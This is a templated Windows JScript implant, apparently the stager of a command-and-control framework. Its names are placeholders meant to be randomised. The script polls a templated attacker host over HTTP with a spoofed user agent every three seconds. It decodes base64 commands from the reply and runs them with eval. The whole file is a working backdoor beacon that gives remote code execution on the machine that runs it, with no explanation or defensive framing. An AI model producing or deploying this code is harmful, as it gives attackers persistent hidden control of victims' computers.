var {{connection_id[0]}} = {{connection_id[1]}}

var {{variables['host'][0]}} = "{{variables['host'][1]}}";
var {{variables['port'][0]}} = "{{variables['port'][1]}}";
var {{variables['useragent'][0]}} = "{{variables['useragent'][1]}}";
var {{variables['content-type'][0]}} = "{{variables['content-type'][1]}}";
var {{variables['x-frame-options'][0]}} = "{{variables['x-frame-options'][1]}}";
var {{variables['wscript.shell'][0]}} = {{variables['wscript.shell'][1]}}

var {{variables['username'][0]}} = {{variables['username'][1]}}

function {{functions['post_req'][0]}}(data){
  var {{variables['winhttp.winhttprequest'][0]}} = {{variables['winhttp.winhttprequest'][1]}}
  {{variables['winhttp.winhttprequest'][0]}}.Open('Post', 'http://{{variables['host'][1]}}:{{variables['port'][1]}}{{checkin_uri}}');
  {{variables['winhttp.winhttprequest'][0]}}.setRequestHeader("User-Agent", "{{variables['useragent'][1]}}");
  {{variables['winhttp.winhttprequest'][0]}}.setRequestHeader("X-Frame-Options", "{{variables['x-frame-options'][1]}}");
  {{variables['winhttp.winhttprequest'][0]}}.setRequestHeader("Content-Type", "{{variables['content-type'][1]}}");
  {{variables['winhttp.winhttprequest'][0]}}.Send(data);
  {{variables['winhttp.winhttprequest'][0]}}.WaitForResponse();
  return {{variables['winhttp.winhttprequest'][0]}}.ResponseText;
}

function base64_decode(data) {
  var xml = new ActiveXObject("Microsoft.XMLDOM");
  var element = xml.createElement("temp_file");
  element.dataType = "bin.base64"
  element.text = data

  var stream = WScript.CreateObject("ADODB.Stream");
  stream.Type = 1;
  stream.open();
  stream.Write(element.nodeTypedValue)

  stream.Position = 0;
  stream.Type = 2;
  stream.CharSet = "utf-8";

  result = stream.ReadText();
  stream.close()
  return result
}

while(true){
  resp = {{functions['post_req'][0]}}('{"connection_id":"'+{{connection_id[0]}}+'"}');
  var start = resp.search('{')
  var end = resp.search('}')
  json_data = "{" + resp.substring(start+1, end) + "}"
  eval("command = " + json_data)
  if(command.eval){
    eval(base64_decode(command.eval));
  }
  WScript.Sleep('3000')
}
